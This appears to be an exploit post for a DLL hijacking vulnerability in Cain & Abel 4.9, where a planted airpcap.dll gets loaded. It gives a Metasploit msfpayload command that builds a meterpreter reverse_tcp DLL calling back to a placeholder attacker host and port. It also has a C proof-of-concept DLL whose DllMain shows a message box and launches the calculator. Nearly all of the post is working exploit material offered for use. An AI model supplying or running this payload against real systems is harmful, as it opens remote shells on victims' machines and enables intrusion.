facebook facebook twitter rss

Cain & Abel V4.9 DLL Hijacking

Author: VH4Ck , Published: 10-05-2015
/*

#[+] Author: VH4Ck

#[+] Exploit Title: Cain & Abel V4.9 DLL Hijacking

#[+] Date: 4/5/2015

#[+] Vendor : http://www.oxid.it/cain.html

#[+] Tested on: Windows XpSP3

#[+]Vulnerable DLL---> airpcap.dll

#[+]Make dll payload with metasploit:> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > airpcap.dll

#[+] GR33TZ : To Bedo Mado and all my friends

#[+] facebook : www.facebook.com/karim.shoair

*/

Proof of Concept (PoC):
============================

#include <windows.h>

int evil() {

MessageBoxA(0, "Calculator will open now", "Cain & Abel V4.9 DLL Hijacking Bug", MB_OK);

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) {

evil();
return 0;

}

Like us on Facebook :